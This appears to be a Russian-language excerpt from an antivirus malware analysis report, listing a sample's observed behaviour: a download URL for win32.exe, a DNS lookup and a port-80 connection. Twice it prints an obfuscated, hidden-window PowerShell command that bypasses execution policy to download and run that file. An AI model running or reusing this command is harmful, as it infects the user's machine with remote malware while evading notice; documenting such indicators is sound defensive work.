Техническая информация
- http://final.sunsetgates.com/win32.exe как %temp%\\win32.exe
- '<SYSTEM32>\cmd.exe' /C POWerShEll.eXE -WiNdowsTYle hidDEn -NOpRoFiLE -exECuTIonpOliCy bYPAss (NEW-ObJeCT SYstEm.NeT.WeBCLieNT).DOwNlOaDFIlE('http://final.sunsetgates.com/win32.exe','%TEMP%\\win32.exe') & %TEMP%\\w...
- 'fi###.#unsetgates.com':80
- http://fi###.#unsetgates.com/win32.exe
- DNS ASK fi###.#unsetgates.com
- '<SYSTEM32>\cmd.exe' /C POWerShEll.eXE -WiNdowsTYle hidDEn -NOpRoFiLE -exECuTIonpOliCy bYPAss (NEW-ObJeCT SYstEm.NeT.WeBCLieNT).DOwNlOaDFIlE('http://final.sunsetgates.com/win32.exe','%TEMP%\\win32.exe') & %TEMP%\\w... (со скрытым окном)